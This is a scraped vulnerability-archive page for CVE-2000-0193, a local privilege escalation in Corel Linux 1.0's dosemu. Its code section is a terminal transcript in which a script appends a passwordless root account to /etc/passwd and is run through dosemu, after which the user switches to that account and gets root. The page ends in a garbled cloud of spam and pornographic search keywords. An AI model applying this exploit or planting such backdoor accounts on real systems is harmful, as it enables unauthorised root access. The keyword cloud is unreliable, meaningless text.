exploits , vulnerabilities , articles , Corel Linux Dosemu Distribution Configuration Vulnerability

Title	Corel Linux Dosemu Distribution Configuration Vulnerability
Published	2000-03-02-12:00AM
Updated	2000-03-02-12:00AM
Class	Configuration Error
CVE	CVE-2000-0193
Remote	No
Local	Yes
Credit	This vulnerability was posted to the Bugtraq mailing list by suid@suid.kg on March 2, 2000.
Vulnerable	Corel Linux OS 1.0
Not Vulnerable
Code	Script started on Fri Feb 25 13:54:00 2000 nebula:~$ id uid=1000(suid) gid=1000(suid) groups=1000(suid) nebula:~$ cat > hack-corel #!/bin/bash echo "owned::0:0::/:/bin/bash" >> /etc/passwd ^D nebula:~$ chmod a+rx hack-corel nebula:~$ export PATH="$PATH:." nebula:~$ dos CPU speed set to 430/1 MHz Running on CPU=586, FPU=1, rdtsc=1 [ snip bunch of dosemu crap ] "Welcome to dosemu 0.98! C:> system hack-corel; sh: : command not found C:> exitERROR: general protection at 0x3f0ff: 0 ERROR: SIGSEGV, protected insn...exiting! nebula:~$ tail -1 /etc/passwd owned::0:0::/:/bin/bash nebula:~$ su owned nebula:/home/suid# id uid=0(root) gid=0(root) groups=0(root) nebula:/home/suid# exit exit nebula:~$ exit
TXT

Vulnerabilities - newest 10 RSS | More

2009-12-18 Centreon Authentication Mechanism Security Bypass Vulnerability
2009-12-18 Family Connections Multiple Input Validation Vulnerabilities
2009-12-18 Drupal Contact and Menu Modules Multiple HTML Injection Vulnerabilities
2009-12-18 Mozilla Firefox and SeaMonkey NTLM Credential Reflection Authentication Bypass Vulnerability
2009-12-18 Mozilla Firefox CVE-2009-3982 JavaScript Engine Multiple Remote Memory Corruption Vulnerabilities
2009-12-17 Zen Cart Insecure File and Programs Information Disclosure and Database Deletion Vulnerability
2009-12-17 Winamp Module Decoder Plugin Multiple Buffer Overflow Vulnerabilities
2009-12-17 Winamp JPEG and PNG Multiple Integer Overflow Vulnerabilities
2009-12-17 HP OpenView Storage Data Protector Stack Buffer Overflow Vulnerability
2009-12-17 IBM WebSphere Application Server Feature Pack for CEA Spoofing Vulnerability

SECURITY RSS FEEDS

Advertising

Copyright 2007, SecurityDot
Fri, 18 Dec 2009 23:07:02 +0000

Friends : milw0rm.com , secunia.com , securityfocus.com
GOOGLE
NEWS EXPLOITS VULNS
exploits , 0day exploits , newest exploits , vulnerabilities , newest vulnerabilities , 0day vulnerabilities , newest articles , linux articles , articles
Sexgil apache rem Americabug SEXY PHOTO 2000 maxcpm.inf news for C *rama azha www.pic2.i Www.s& nuke addon lo993l P...la.net +...t%252F nudo BAD php-nuke 2 sexy video http.www.b /phpsecuri invizion cisco 11.2 mambo Remo www.hbdddl www.woall. list of se n...ormal/ sex frans SAXYY VIDO Chath Joomla Com linux 2.6. b pumper.c ultra edit real fucki search/exp free hot b bind 4.9.1 news for C www.devdiv sexfilms www89.com www,18year www.007mov news for c mysql 5.0. apache%2Br Www.animal maxcpm.inf www.xxx/vi